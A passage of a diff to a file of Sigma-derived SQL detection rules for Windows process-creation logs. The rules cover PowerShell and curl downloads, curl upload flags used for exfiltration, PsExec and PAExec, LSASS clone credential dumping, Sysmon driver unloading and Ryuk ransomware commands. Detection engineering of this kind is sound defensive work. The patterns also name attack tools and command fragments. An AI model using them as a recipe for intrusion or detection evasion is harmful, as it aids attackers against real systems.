"attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "status": "experimental", + "description": 
"Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.execution" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Legitimate administrative tasks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { "title": "PUA - NirCmd Execution As LOCAL SYSTEM", 
@@ -11988,339 +11859,363 @@ "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "status": "test", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "falsepositives": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_renamed_paexec.yml" + }, + { + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": 
"Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Unlikely" + "WindowsApps installing updates via the quiet flag" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", + 
"title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. 
Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "status": "experimental", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.t1106", - 
"attack.t1059.003", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs 
WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "status": "test", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs 
